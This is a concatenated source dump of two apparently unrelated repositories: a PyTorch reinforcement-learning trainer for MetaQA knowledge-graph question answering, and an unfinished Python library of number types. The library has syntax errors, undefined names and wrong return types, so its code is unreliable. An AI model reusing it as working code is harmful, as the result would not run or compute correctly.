max_len = max(len(x.action_chain) for x in episodes)
trg = torch.cat(tuple(map(lambda x: torch.tensor([[sos_index] + [action_to_ix[action] for action in x.action_chain] + [pad_index]*(max_len-len(x.action_chain))], device=DEVICE), episodes)), dim=0)
trg_lengths = list(map(lambda x: len(x.action_chain)+1, episodes))
kgnode_chains = [episode.kgnode_chain for episode in episodes]
action_chains = [episode.action_chain for episode in episodes]
reward_chains = [episode.reward_chain for episode in episodes]
return Batch((src, src_lengths), (trg, trg_lengths), pad_index=pad_index), kgnode_chains, action_chains, reward_chains
def compute_loss(episodes, tokenizer, model, action_to_ix, verbose=False):
batch, kgnode_chains, action_chains, reward_chains = make_batch(episodes, tokenizer, action_to_ix)
_, _, pre_output, _ = model.forward(batch.src, batch.trg, batch.src_mask, batch.trg_mask, batch.src_lengths, batch.trg_lengths)
batch_values = model.evaluator(pre_output)
losses = []
for (i, (kgnode_chain, action_chain, reward_chain)) in enumerate(zip(kgnode_chains, action_chains, reward_chains)):
for t in range(len(kgnode_chain)):
kgnode, action, reward = kgnode_chain[t], action_chain[t], reward_chain[t]
if t != len(kgnode_chain)-1:
kgnode_next = kgnode_chain[t+1]
actions_next = unique([info["type"] for (_, _, info) in G.edges(kgnode_next, data=True)]) + ["terminate"]
values_next = batch_values[i, t+1, [action_to_ix[action] for action in actions_next]]
reference = reward + gamma*values_next.max().item()
else:
reference = reward
losses.append(loss_func(batch_values[i, t, action_to_ix[action]], reference))
if verbose:
print(" {:100s} {:30s} {:7.4f} {:7.4f}".format(kgnode, action, batch_values[i, t, action_to_ix[action]].data.to("cpu").item(), reference.to("cpu").item()))
return sum(losses) / len(losses)
def evaluate_accuracy(G, qa_instances, tokenizer, model, action_to_ix, max_len, verbose=False):
num_success = 0
for qa_instance in qa_instances:
with torch.no_grad():
_, _, reward_chain = simulate_episode(G, qa_instance, tokenizer, model, action_to_ix, max_len, 0.0, verbose)
if verbose:
print("\noutcome: {:s}\n".format("success" if (reward_chain[-1] == 1.0) else "failure"))
num_success += 1 if (reward_chain[-1] == 1.0) else 0
return num_success / len(qa_instances)
if __name__ == "__main__":
emb_size = 256
hidden_size = 512
num_layers = 1
max_len = 4
gamma = 0.90
kappa = 0.20
epsilon_start = 1.00
epsilon_end = 0.10
decay_rate = 5.00
M = 3000000
batch_size = 32
experiment = "e{:03d}_h{:03d}_l{:02d}_g{:03d}_k{:03d}_m{:07d}".format(emb_size, hidden_size, num_layers, int(gamma*100), int(kappa*100), M)
os.makedirs("checkpoints/{:s}".format(experiment), exist_ok=True)
sys.stderr = sys.stdout = open("logs/{:s}".format(experiment), "w")
entity_token = "[ETY]"
tokenizer = AutoTokenizer.from_pretrained("bert-base-uncased", additional_special_tokens=[entity_token])
G = read_MetaQA_KG()
qa_train_1h, qa_dev_1h, qa_test_1h = read_MetaQA_Instances("1-hop", entity_token, DEVICE)
qa_train_2h, qa_dev_2h, qa_test_2h = read_MetaQA_Instances("2-hop", entity_token, DEVICE)
qa_train_3h, qa_dev_3h, qa_test_3h = read_MetaQA_Instances("3-hop", entity_token, DEVICE)
qa_train = pd.concat([qa_train_1h, qa_train_2h, qa_train_3h])
qa_dev = pd.concat([ qa_dev_1h, qa_dev_2h, qa_dev_3h])
qa_test = pd.concat([ qa_test_1h, qa_test_2h, qa_test_3h])
possible_actions = ["[PAD]", "[SOS]"] + sorted(list(set([edge[2]["type"] for edge in G.edges(data=True)]))) + ["terminate"]
action_to_ix = dict(map(reversed, enumerate(possible_actions)))
model = make_model(len(tokenizer), len(possible_actions), emb_size=emb_size, hidden_size=hidden_size, num_layers=num_layers, dropout=0.2).to(DEVICE)
loss_func = nn.MSELoss()
optimizer = optim.AdamW(model.parameters(), lr=3.0e-4, betas=(0.9, 0.999), weight_decay=2.5e-4)
memory_overall = ReplayMemory(1000)
memory_success = ReplayMemory(1000)
memory_failure = ReplayMemory(1000)
for m in range(M):
epsilon = epsilon_end + (epsilon_start - epsilon_end) * math.exp(-decay_rate * (m / M))
print("epsilon: {:5.3f}".format(epsilon))
if (len(memory_failure) > 0) and (random.random() < kappa):
qa_instance = memory_failure.sample_random(1)[0].qa_instance
else:
qa_instance = qa_train.sample(1).values[0]
with torch.no_grad():
kgnode_chain, action_chain, reward_chain = simulate_episode(G, qa_instance, tokenizer, model, action_to_ix, max_len, epsilon, verbose=True)
print("\noutcome: {:s}\n".format("success" if (reward_chain[-1] == 1.0) else "failure"))
if reward_chain[-1] == 1.0:
memory_overall.push(Episode(qa_instance, kgnode_chain, action_chain, reward_chain))
memory_success.push(Episode(qa_instance, kgnode_chain, action_chain, reward_chain))
else:
memory_overall.push(Episode(qa_instance, kgnode_chain, action_chain, reward_chain))
memory_failure.push(Episode(qa_instance, kgnode_chain, action_chain, reward_chain))
# optimize model
episodes = memory_overall.sample_random(batch_size)
loss = compute_loss(episodes, tokenizer, model, action_to_ix, verbose=True)
optimizer.zero_grad()
loss.backward()
optimizer.step()
print("\n")
if (m+1) % 100000 == 0:
model.train(False)
print(" training accuracies for 1-hop, 2-hop, 3-hop questions are {:7.4f}, {:7.4f}, {:7.4f}".format(evaluate_accuracy(G, qa_train_1h, tokenizer, model, action_to_ix, max_len),
evaluate_accuracy(G, qa_train_2h, tokenizer, model, action_to_ix, max_len),
evaluate_accuracy(G, qa_train_3h, tokenizer, model, action_to_ix, max_len)))
print("validation accuracies for 1-hop, 2-hop, 3-hop questions are {:7.4f}, {:7.4f}, {:7.4f}".format(evaluate_accuracy(G, qa_dev_1h, tokenizer, model, action_to_ix, max_len),
evaluate_accuracy(G, qa_dev_2h, tokenizer, model, action_to_ix, max_len),
evaluate_accuracy(G, qa_dev_3h, tokenizer, model, action_to_ix, max_len)))
model.train(True)
print("\n\n")
torch.save({"model": model.state_dict()}, "checkpoints/{:s}/save@{:07d}.pt".format(experiment, m+1))
model.train(False)
print(" testing accuracies for 1-hop, 2-hop, 3-hop questions are {:7.4f}, {:7.4f}, {:7.4f}".format(evaluate_accuracy(G, qa_test_1h, tokenizer, model, action_to_ix, max_len, True),
evaluate_accuracy(G, qa_test_2h, tokenizer, model, action_to_ix, max_len, True),
evaluate_accuracy(G, qa_test_3h, tokenizer, model, action_to_ix, max_len, True)))
model.train(True)
--- FILE SEPARATOR ---
import os
import torch
from transformers import GPT2Tokenizer, GPT2Model
os.environ['KMP_DUPLICATE_LIB_OK'] = 'True'
# tokenizer.tokenize
# tokenize.encode
# tokenize.forward
tokenizer = GPT2Tokenizer.from_pretrained('gpt2', pad_token="[PAD]", additional_special_tokens=["[OBJ]"])
model = GPT2Model.from_pretrained('gpt2')
embedding_layer = model.resize_token_embeddings(len(tokenizer)) # Update the model embeddings with the new vocabulary size
inputs = tokenizer("who is the writer for [OBJ]", max_length=50, padding="max_length", truncation=True, return_tensors='pt')
outputs = model(input_ids=inputs["input_ids"], attention_mask=inputs["attention_mask"])
from transformers import AutoTokenizer
tokenizer = AutoTokenizer.from_pretrained("bert-base-uncased", additional_special_tokens=["[OBJ]"])
inputs = tokenizer("who is the writer for [OBJ]", max_length=10, padding="max_length", truncation=True, return_tensors='pt')
--- FILE SEPARATOR ---
import networkx as nx
import pandas as pd
import random
import re
import torch
from collections import namedtuple
from transformers import AutoTokenizer
QAInstance = namedtuple("QAInstance", ["question", "decorated_entity", "answer_set"])
Episode = namedtuple("Episode", ["qa_instance", "kgnode_chain", "action_chain", "reward_chain"])
class ReplayMemory:
def __init__(self, capacity):
self.capacity = capacity
self.memory = []
self.position = 0
def push(self, episode):
if len(self.memory) < self.capacity:
self.memory.append(None)
self.memory[self.position] = episode
self.position = (self.position + 1) % self.capacity
def sample_random(self, batch_size):
batch = random.choices(self.memory, k=batch_size)
return batch
def sample_last(self, batch_size):
pointer = self.position
batch = []
for _ in range(batch_size):
pointer = (pointer - 1 + len(self.memory)) % len(self.memory)
batch.append(self.memory[pointer])
return batch
def __len__(self):
return len(self.memory)
def unique(items):
return sorted(list(set(items)))
def read_MetaQA_KG():
def edge_to_prefix(edge):
if edge == "directed_by":
return "director: "
elif edge == "written_by":
return "writer: "
elif edge == "starred_actors":
return "actor: "
elif edge == "release_year":
return "year: "
elif edge == "in_language":
return "language: "
elif edge == "has_tags":
return "tag: "
elif edge == "has_genre":
return "genre: "
elif edge == "has_imdb_votes":
return "votes: "
elif edge == "has_imdb_rating":
return "rating: "
else:
raise Exception("unexpected edge type \"" + edge + "\"")
df = pd.read_csv("datasets/MetaQA/kb.txt", delimiter='|', names=["head", "edge", "tail"])
decorated_heads = "movie: " + df["head"]
decorated_tails = df["edge"].apply(edge_to_prefix) + df["tail"]
fwd_edges = "fwd_"+df["edge"]
rvs_edges = "rvs_"+df["edge"]
G = nx.MultiDiGraph()
G.add_nodes_from(zip(decorated_heads.unique(), [{"type": decorated_head.split(':')[0]} for decorated_head in decorated_heads.unique()]))
G.add_nodes_from(zip(decorated_tails.unique(), [{"type": decorated_tail.split(':')[0]} for decorated_tail in decorated_tails.unique()]))
G.add_edges_from(zip(decorated_heads, decorated_tails, [{"type": fwd_edge} for fwd_edge in fwd_edges]))
G.add_edges_from(zip(decorated_tails, decorated_heads, [{"type": rvs_edge} for rvs_edge in rvs_edges]))
return G
def read_MetaQA_Instances(question_type="1-hop", entity_token="[ETY]", device="cpu"):
def process_question(question):
processed_question = re.sub(r"(\[.+\])", entity_token, question)
entity = re.search(r"\[(.+)\]", question).group(1)
return processed_question, entity
def process_answers(answers):
return set(answers.split('|'))
def info_to_instance(info):
processed_question, entity = process_question(info["question"])
decorated_entity = info["question_type"].split('_')[0] + ": " + entity
answer_set = process_answers(info["answers"])
return QAInstance(processed_question, decorated_entity, answer_set)
qa_text_train = pd.read_csv("datasets/MetaQA/"+question_type+"/vanilla/qa_train.txt", delimiter='\t', names=["question", "answers"])
qa_qtype_train = pd.read_csv("datasets/MetaQA/"+question_type+"/qa_train_qtype.txt", names=["question_type"])
qa_info_train = pd.concat([qa_text_train, qa_qtype_train], axis=1)
qa_instance_train = qa_info_train.apply(info_to_instance, axis=1)
qa_text_dev = pd.read_csv("datasets/MetaQA/"+question_type+"/vanilla/qa_dev.txt", delimiter='\t', names=["question", "answers"])
qa_qtype_dev = pd.read_csv("datasets/MetaQA/"+question_type+"/qa_dev_qtype.txt", names=["question_type"])
qa_info_dev = pd.concat([qa_text_dev, qa_qtype_dev], axis=1)
qa_instance_dev = qa_info_dev.apply(info_to_instance, axis=1)
qa_text_test = pd.read_csv("datasets/MetaQA/"+question_type+"/vanilla/qa_test.txt", delimiter='\t', names=["question", "answers"])
qa_qtype_test = pd.read_csv("datasets/MetaQA/"+question_type+"/qa_test_qtype.txt", names=["question_type"])
qa_info_test = pd.concat([qa_text_test, qa_qtype_test], axis=1)
qa_instance_test = qa_info_test.apply(info_to_instance, axis=1)
return qa_instance_train, qa_instance_dev, qa_instance_test
|
[
"/main.py",
"/playground.py",
"/utils.py"
] |
000alen/Engine
|
from Engine.Number import DEFAULT_PRECISION, Number, NUMBER_ZERO, NUMBER_ONE
from numba import njit
@njit
def number_division(x: Number, y: Number, n: int = DEFAULT_PRECISION) -> Number:
if y == NUMBER_ZERO:
raise ZeroDivisionError
if x == NUMBER_ZERO:
return NUMBER_ZERO
if x == y:
return NUMBER_ONE
x = x.reduce()
y = y.reduce()
dividend = abs(x.mantissa)
divisor = abs(y.mantissa)
dividend_exponent = x.exponent
divisor_exponent = y.exponent
dividend_sign = 1 if x.mantissa >= 0 else -1
divisor_sign = 1 if y.mantissa >= 0 else -1
sign = dividend_sign * divisor_sign
delta_exponent = 0
quotient = []
dividend_history = []
i = 0
while dividend > 0:
i += 1
if N(dividend) < N(divisor):
dN = N(divisor) - N(dividend)
dividend *= pow(10, dN)
delta_exponent += dN
if dividend < divisor:
dividend *= 10
delta_exponent += 1
quotient.append(dividend // divisor)
dividend -= quotient[-1] * divisor
if dividend not in dividend_history:
dividend_history.append(dividend)
elif i >= n:
break
quotient = sum(
digit * pow(10, i)
for i, digit i enumerate(reversed(quotient))
)
return Number(
sign * quotient,
dividend_exponent - divisor_exponent - delta_exponent
)
@njit
def number_floor_division(x: Number, y: Number) -> Number:
if y == NUMBER_ZERO:
raise ZeroDivisionError
if x == NUMBER_ZERO or abs(x) < abs(y):
return NUMBER_ZERO
if x == y:
return NUMBER_ONE
x = x.reduce()
y = y.reduce()
dividend = abs(x.mantissa)
divisor = abs(y.mantissa)
dividend_exponent = x.exponent
divisor_exponent = y.exponent
dividend_sign = 1 if x.mantissa >= 0 else -1
divisor_sign = 1 if y.mantissa >= 0 else -1
sign = dividend_sign * divisor_sign
minimum_exponent = min(dividend_exponent, divisor_exponent)
dividend *= pow(10, dividend_exponent - minimum_exponent)
divisor *= pow(10, divisor_exponent - minimum_exponent)
quotient = dividend // divisor
return Number(
sign * quotient,
minimum_exponent
)
--- FILE SEPARATOR ---
from Engine.Number import DEFAULT_PRECISION_TAYLOR_POLYNOMIAL
from functools import cache
from math import floor, log
from numba import njit
@cache
def N(x: int) -> int:
if x == 0:
return 1
return floor(log(abs(x), 10)) + 1
@njit
def factorial(x: "Numeric") -> "Numeric":
from Engine.Number.Number import NUMERIC_ONE
y = NUMERIC_ONE
i = NUMERIC_ONE
while i <= x:
y *= i
i += NUMERIC_ONE
return y
@njit
def sin(x: "Numeric", n: int = DEFAULT_PRECISION_TAYLOR_POLYNOMIAL) -> "Numeric":
from Engine.Number.Number import Numeric, NUMERIC_ZERO
y = NUMERIC_ZERO
for i in range(n):
y += (Numeric(-1, 0) ** i) / \
factorial(Numeric((2 * i) + 1, 0)) * (x ** ((2 * i) + 1))
return y
@njit
def cos(x: "Numeric", n: int = DEFAULT_PRECISION_TAYLOR_POLYNOMIAL) -> "Numeric":
from Engine.Number.Number import Numeric, NUMERIC_ZERO
y = NUMERIC_ZERO
for i in range(n):
y += (Numeric(-1, 0) ** i) / \
factorial(Numeric(2 * i, 0)) * (x ** (2 * i))
return y
@njit
def exp(x: "Numeric", n: int = DEFAULT_PRECISION_TAYLOR_POLYNOMIAL) -> "Numeric":
raise NotImplementedError
--- FILE SEPARATOR ---
from Engine.Number import Skeleton
from Engine.Number.Real import Real, REAL_ZERO, REAL_ONE
from Engine.Number.Imaginary import Imaginary, IMAGINARY_ZERO, IMAGINARY_ONE
class Complex(Skeleton):
__real: Real
__imaginary: Imaginary
def __init__(self, real: Real, imaginary: Imaginary):
self.__real = real
self.__imaginary = imaginary
def __hash__(self):
return hash(("Complex", self.real, self.imaginary))
def __str__(self):
pass
@classmethod
def from_string(cls, string):
return cls(Real.from_string(string), IMAGINARY_ZERO)
@classmethod
def from_python_integer(cls, python_integer):
return cls(Real.from_python_integer(python_integer), IMAGINARY_ZERO)
@classmethod
def from_number(cls, number):
return cls(Real.from_number(number), IMAGINARY_ZERO)
@classmethod
def from_natural(cls, natural):
return cls(Real.from_natural(natural), IMAGINARY_ZERO)
@classmethod
def from_integer(cls, integer):
return cls(Real.from_integer(integer), IMAGINARY_ZERO)
@classmethod
def from_rational(cls, rational):
return cls(Real.from_rational(rational), IMAGINARY_ZERO)
@classmethod
def from_irrational(cls, irrational):
return cls(Real.from_irrational(irrational), IMAGINARY_ZERO)
@classmethod
def from_real(cls, real):
return cls(real, IMAGINARY_ZERO)
@classmethod
def from_imaginary(cls, imaginary):
return cls(REAL_ZERO, imaginary)
@property
def real(self):
return self.__real
@property
def imaginary(self):
return self.__imaginary
COMPLEX_ZERO = Complex(REAL_ZERO, IMAGINARY_ZERO)
COMPLEX_ONE = Complex(REAL_ONE, IMAGINARY_ZERO)
COMPLEX_I = Complex(REAL_ZERO, IMAGINARY_ONE)
--- FILE SEPARATOR ---
from Engine.Number import Skeleton
from Engine.Number.Real import Real, REAL_ZERO, REAL_ONE
class Imaginary(Skeleton):
__value: Real
def __init__(self, value: Real):
self.__value = value
def __hash__(self):
return hash(("Imaginary", self.value))
@property
def value(self):
pass
@property
def real(self):
return None
@property
def imaginary(self):
return self
IMAGINARY_ZERO = Imaginary(REAL_ZERO)
IMAGINARY_ONE = Imaginary(REAL_ONE)
I = IMAGINARY_ONE
--- FILE SEPARATOR ---
from Engine.Number import Skeleton, Number, NUMBER_ZERO, NUMBER_ONE
from Engine.Number.Natural import Natural
class Integer(Skeleton):
__value: Number
def __init__(self, value: Number):
assert self.__is_valid_value(value)
self.__value = value
def __hash__(self):
return hash(("Integer", self.value))
def __str__(self):
return f"{self.value}"
@classmethod
def __is_valid_value(cls, value: Number) -> bool:
return value.is_integer
@classmethod
def from_string(cls, string: str) -> "Integer":
return cls(Number.from_string(string))
@classmethod
def from_python_integer(cls, python_integer: int) -> "Integer":
return cls(Number.from_python_integer(python_integer))
@classmethod
def from_number(cls, number: Number) -> "Integer":
return cls(number)
@classmethod
def from_natural(cls, natural: Natural) -> "Integer":
return cls(natural.value)
@property
def value(self) -> Number:
return self.__value
@property
def real(self) -> "Integer":
return self
@property
def imaginary(self):
return None
@property
def is_integer(self) -> bool:
return True
@property
def is_fractional(self) -> bool:
return False
def equal(self, other: "Integer") -> bool:
return self.value == other.value
def lower(self, other: "Integer") -> bool:
return self.value < other.value
def greater(self, other: "Integer") -> bool:
return self.value > other.value
def lower_equal(self, other: "Integer") -> bool:
return self.value <= other.value
def greater_equal(self, other: "Integer") -> bool:
return self.value >= other.value
def absolute(self) -> "Integer":
return Integer(
abs(self.value)
)
def add(self, other: "Integer") -> "Integer":
return Natural(
self.value + other.value
)
def negate(self): "Integer":
return Integer(
-self.value
)
def subtract(self, other: "Integer") -> "Integer":
return Natural(
self.value - other.value
)
def multiply(self, other: "Integer") -> "Integer":
return Natural(
self.value * other.value
)
def power(self, other: "Integer") -> "Integer":
assert other >= 0
return Natural(
self.value ** other.value
)
def divide(self, other: "Integer") -> "Integer":
return Integer(
self.value / other.value
)
def floor_divide(self, other: "Integer") -> "Integer":
return Integer(
self.value // other.value
)
def modulus(self, other: "Integer") -> "Integer":
return Integer(
self.value % other.value
)
INTEGER_ZERO = Integer(NUMBER_ZERO)
INTEGER_ONE = Integer(NUMBER_ONE)
--- FILE SEPARATOR ---
from Engine.Number import Skeleton
class Irrational(Skeleton):
# __generator: Function
def __init__(self, generator):
self.__generator = generator
def __hash__(self):
return hash("Irrational", self.generator)
# def __str__(self):
# return f"{self.compute()}..."
@property
def generator(self):
return self.__generator
@property
def real(self):
return self
@property
def imaginary(self):
return None
IRRATIONAL_ZERO = Irrational(lambda: 0)
IRRATIONAL_ONE = Irrational(lambda: 1)
--- FILE SEPARATOR ---
from Engine.Algorithm import natural_modulus
from Engine.Number import Skeleton, Number, NUMBER_ZERO, NUMBER_ONE
class Natural(Skeleton):
__value: Number
def __init__(self, value: Number):
assert self.__is_valid_value(value)
self.__value = value
def __hash__(self):
return hash(("Natural", self.value))
def __str__(self) -> str:
return f"{value}"
@classmethod
def __is_valid_value(cls, value: Number) -> bool:
return value.is_integer and value >= NUMBER_ZERO
@classmethod
def from_string(cls, string: str) -> "Natural":
return cls(Number.from_string(string))
@classmethod
def from_python_integer(cls, python_integer: int) -> "Natural":
return cls(Number.from_python_integer(python_integer))
@classmethod
def from_number(cls, number: Number) -> "Natural":
return cls(number)
@property
def value(self) -> "Number":
return self.__value
@property
def real(self) -> "Natural":
return self
@property
def imaginary(self):
return None
@property
def is_integer(self) -> bool:
return True
@property
def is_fractional(self) -> bool:
return False
def equal(self, other: "Natural") -> bool:
return self.value == other.value
def lower(self, other: "Natural") -> bool:
return self.value < other.value
def greater(self, other: "Natural") -> bool:
return self.value > other.value
def lower_equal(self, other: "Natural") -> bool:
return self.value <= other.value
def greater_equal(self, other: "Natural") -> bool:
return self.value >= other.value
def absolute(self) -> "Natural":
return self
def add(self, other: "Natural") -> "Natural":
return Natural(
self.value + other.value
)
def subtract(self, other: "Natural") -> "Natural":
return Natural(
self.value - other.value
)
def multiply(self, other: "Natural") -> "Natural":
return Natural(
self.value * other.value
)
# TODO: Implement Efficient Exponentiation
def power(self, other: "Natural") -> "Natural":
return Natural(
self.value ** other.value
)
def divide(self, other: "Natural") -> "Natural":
return Natural(
self.value / other.value
)
def floor_divide(self, other: "Natural") -> "Natural":
return Natural(
self.value // other.value
)
def modulus(self, other: "Natural") -> "Natural":
return Natural(
self.value % other.value
)
NATURAL_ZERO = Natural(NUMBER_ZERO)
NATURAL_ONE = Natural(NUMBER_ONE)
--- FILE SEPARATOR ---
from Engine.Number import Skeleton, Number
from Engine.Number.Natural import Natural
from Engine.Number.Integer import Integer, INTEGER_ZERO, INTEGER_ONE
class Rational(Skeleton):
__numerator: Integer
__denominator: Integer
def __init__(self, numerator: Integer, denominator: Integer):
assert denominator != INTEGER_ZERO
self.__numerator = numerator
self.__denominator = denominator
def __hash__(self):
return hash(("Rational", self.numerator, self.denominator))
def __str__(self) -> str:
return f"{self.numerator}/{self.denominator}"
@classmethod
@classmethod
def from_string(cls, string: str) -> "Rational":
return cls(Integer.from_string(string), INTEGER_ONE)
@classmethod
def from_python_integer(cls, python_integer: int) "Rational":
return cls(Integer.from_python_integer(python_integer), INTEGER_ONE)
@classmethod
def from_number(cls, number: Number) -> "Rational":
return cls(Integer.from_number(number), INTEGER_ONE)
@classmethod
def from_natural(cls, natural: Natural) -> "Rational":
return cls(Integer.from_natural(natural), INTEGER_ONE)
@classmethod
def from_integer(cls, integer: Integer) -> "Rational":
return cls(integer, INTEGER_ONE)
@property
def numerator(self) -> "Integer":
return self.__numerator
@property
def denominator(self) -> "Integer":
return self.__denominator
@property
def real(self) -> "Rational":
return self
@property
def imaginary(self):
return None
def reduce(self) -> "Rational":
pass
def equal(self, other: "Rational") -> bool:
return self.value == other.value
def lower(self, other: "Integer") -> bool:
return self.value < other.value
def greater(self, other: "Integer") -> bool:
return self.value > other.value
def lower_equal(self, other: "Integer") -> bool:
return self.value <= other.value
def greater_equal(self, other: "Integer") -> bool:
return self.value >= other.value
def absolute(self) -> "Integer":
return Integer(
abs(self.value)
)
def add(self, other: "Integer") -> "Integer":
return Natural(
self.value + other.value
)
def negate(self): "Integer":
return Integer(
-self.value
)
def subtract(self, other: "Integer") -> "Integer":
return Natural(
self.value - other.value
)
def multiply(self, other: "Integer") -> "Integer":
return Natural(
self.value * other.value
)
def power(self, other: "Integer") -> "Integer":
assert other >= 0
return Natural(
self.value ** other.value
)
def divide(self, other: "Integer") -> "Integer":
return Natural(
self.value / other.value
)
RATIONAL_ZERO = Rational(INTEGER_ZERO, INTEGER_ONE)
RATIONAL_ONE = Rational(INTEGER_ONE, INTEGER_ONE)
--- FILE SEPARATOR ---
from Engine.Number import Skeleton
from Engine.Number.Rational import Rational, RATIONAL_ZERO, RATIONAL_ONE
from Engine.Number.Irrational import Irrational, IRRATIONAL_ZERO
class Real(Skeleton):
__rational: Rational
__irrational: Irrational
def __init__(self, rational: Rational = None, irrational: Irrational = None):
assert rational != irrational != None
self.__rational = rational
self.__irrational = irrational
def __hash__(self):
return hash(("Real", self.rational, self.irrational))
# def __str__(self):
# return f"{self.compute()}"
@classmethod
def from_string(cls, string):
return cls(Rational.from_string(string), IRRATIONAL_ZERO)
@classmethod
def from_python_integer(cls, python_integer):
return cls(Rational.from_python_integer(python_integer), IRRATIONAL_ZERO)
@classmethod
def from_number(cls, number):
return cls(Rational.from_number(number), IRRATIONAL_ZERO)
@classmethod
def from_natural(cls, natural):
return cls(Rational.from_natural(natural), IRRATIONAL_ZERO)
@classmethod
def from_integer(cls, integer):
return cls(Rational.from_integer(integer), IRRATIONAL_ZERO)
@classmethod
def from_rational(cls, rational):
return cls(rational, IRRATIONAL_ZERO)
@classmethod
def from_irrational(cls, irrational):
return cls(RATIONAL_ZERO, irrational)
@property
def rational(self):
return self.__rational
@property
def irrational(self):
return self.__irrational
@property
def real(self):
return self
@property
def imaginary(self):
return None
REAL_ZERO = Real(RATIONAL_ZERO)
REAL_ONE = Real(RATIONAL_ONE)
--- FILE SEPARATOR ---
from Engine.Algorithm.Division import number_division, number_floor_division
from Engine.Number.Operation import N
from abc import ABC, abstractmethod, abstractproperty, abstractclassmethod
DEFAULT_PRECISION = 15
DEFAULT_PRECISION_TAYLOR_POLYNOMIAL = 5
class Skeleton(ABC):
def __eq__(self, other):
if type(other) is not type(self):
other = self.upgrade(other)
return self.equal(other)
def __ne__(self, other):
if type(other) is not type(self):
other = self.upgrade(other)
return not self.equal(other)
def __lt__(self, other):
if type(other) is not type(self):
other = self.upgrade(other)
return self.lower(other)
def __gt__(self, other):
if type(other) is not type(self):
other = self.upgrade(other)
return self.greater(other)
def __le__(self, other):
if type(other) is not type(self):
other = self.upgrade(other)
return self.lower_equal(other)
def __ge__(self, other):
if type(other) is not type(self):
other = self.upgrade(other)
return self.greater_equal(other)
def __abs__(self):
return self.absolute()
def __add__(self, other):
if type(other) is not type(self):
other = self.upgrade(other)
return self.add(other)
def __neg__(self):
return self.negate()
def __sub__(self, other):
if type(other) is not type(self):
other = self.upgrade(other)
return self.subtract(other)
def __mul__(self, other):
if type(other) is not type(self):
other = self.upgrade(other)
return self.multiply(other)
def __pow__(self, other):
if type(other) is not type(self):
other = self.upgrade(other)
return self.power(other)
def __truediv__(self, other):
if type(other) is not type(self):
other = self.upgrade(other)
return self.divide(other)
def __floordiv__(self, other):
if type(other) is not type(self):
other = self.upgrade(other)
return self.floor_divide(other)
def __mod__(self, other):
if type(other) is not type(self):
other = self.upgrade(other)
return self.modulus(other)
@classmethod
def upgrade(cls, other):
from Engine.Number.Natural import Natural
from Engine.Number.Integer import Integer
from Engine.Number.Rational import Rational
from Engine.Number.Irrational import Irrational
from Engine.Number.Real import Real
from Engine.Number.Imaginary import Imaginary
wrapper = {
cls: lambda x: x,
str: cls.from_string,
int: cls.from_python_integer,
Number: cls.from_number,
Natural: cls.from_natural,
Integer: cls.from_integer,
Rational: cls.from_rational,
Irrational: cls.from_irrational,
Real: cls.from_real,
Imaginary: cls.from_imaginary
}
try:
return wrapper[type(other)](other)
except:
raise Exception
@abstractproperty
def real(self):
raise NotImplementedError
@abstractproperty
def imaginary(self):
raise NotImplementedError
class Number(Skeleton):
__mantissa: int
__exponent: int
def __init__(self, mantissa: int, exponent: int):
self.__mantissa = mantissa
self.__exponent = exponent
def __hash__(self):
x = self.reduce()
return hash(("Number", x.mantissa, x.exponent))
def __str__(self) -> str:
return f"{self.mantissa}e{self.exponent}"
@classmethod
def from_string(cls, string: str) -> "Number":
if "e" in string:
mantissa, exponent = [int(_) for _ in string.split("e")]
return cls(
mantissa,
exponent
)
elif "." in string:
_, fractional = [int(_) for _ in string.split(".")]
return cls(
int(string.replace(".", "")),
-N(fractional)
)
else:
raise Exception
@classmethod
def from_python_integer(cls, python_integer: int) -> "Number":
return cls(
python_integer,
0
)
@property
def mantissa(self) -> int:
return self.__mantissa
@property
def exponent(self) -> int:
return self.__exponent
@property
def real(self) -> "Number":
return self
@property
def imaginary(self):
return None
@property
def is_integer(self) -> bool:
x = self.reduce()
return x.exponent >= 0
@property
def is_fractional(self) -> bool:
return not self.is_integer
# TODO: See if there is a more efficient way to do this
def reduce(self) -> "Number":
n = max(i for i in range(N(self.mantissa))
if abs(self.mantissa) % pow(10, i) == 0)
mantissa = abs(self.mantissa) // pow(10, n)
exponent = self.exponent + n
return Number(
mantissa,
exponent
)
def equal(self, other: "Number") -> bool:
x = self.reduce()
y = other.reduce()
return x.mantissa == y.mantissa and x.exponent == y.exponent
def lower(self, other: "Number") -> bool:
x = self.reduce()
y = other.reduce()
minimum_exponent = min(x.exponent, y.exponent)
x_mantissa = x.mantissa * pow(10, x.exponent - minimum_exponent)
y_mantissa = y.mantissa * pow(10, y.exponent - minimum_exponent)
return x_mantissa < y_mantissa
def greater(self, other: "Number") -> bool:
return not self.equal(other) and not self.lower(other)
def lower_equal(self, other: "Number") -> bool:
return self.equal(other) or self.lower(other)
def greater_equal(self, other: "Number") -> bool:
return self.equal(other) or self.greater(other)
def absolute(self) -> "Number":
return Number(
abs(self.mantissa),
self.exponent
)
def add(self, other: "Number") -> "Number":
minimun_exponent = min(self.exponent, other.exponent)
return Number(
(self.mantissa * pow(10, self.exponent - minimun_exponent)) +
(other.mantissa * pow(10, other.exponent - minimun_exponent)),
minimun_exponent
)
def negate(self) -> "Number":
return Number(
-self.mantissa,
self.exponent
)
def subtract(self, other: "Number") -> "Number":
return self.add(other.negate())
def multiply(self, other: "Number") -> "Number":
return Number(
self.mantissa * other.mantissa,
self.exponent + other.exponent
)
# TODO: Implement efficient exponentiation
def power(self, other: "Number") -> "Number":
assert other.is_integer and other >= NUMBER_ZERO
return Number(
self.mantissa ** other.mantissa,
self.exponent * other.mantissa
)
def invert(self, n: int = DEFAULT_PRECISION) -> "Number":
if self == NUMBER_ZERO:
raise ZeroDivisionError
return number_division(NUMBER_ONE, self)
def divide(self, other: "Number") -> "Number":
if other == NUMBER_ZERO:
raise ZeroDivisionError
return number_division(self, other)
def floor_divide(self, other: "Number") -> "Number":
if other == NUMBER_ZERO:
raise ZeroDivisionError
return number_floor_division(self, other)
def modulus(self, other: "Number") -> "Number":
assert self.is_integer and self >= NUMBER_ZERO
assert other.is_integer and other >= NUMBER_ZERO
if other == NUMBER_ZERO:
raise ZeroDivisionError
return self - (other * self.floor_divide(other))
NUMBER_ZERO = Number(0, 0)
NUMBER_ONE = Number(1, 0)
--- FILE SEPARATOR ---
from Engine.Number.Number import Numeric, NUMERIC_ZERO, NUMERIC_ONE, Complex
from Engine.Number.Operation import factorial, sin, cos
x = NUMERIC_ONE
print(factorial(1))
print(sin(x))
print(cos(x))
|
[
"/Engine/Algorithm/Division.py",
"/Engine/Algorithm/Operation.py",
"/Engine/Number/Complex.py",
"/Engine/Number/Imaginary.py",
"/Engine/Number/Integer.py",
"/Engine/Number/Irrational.py",
"/Engine/Number/Natural.py",
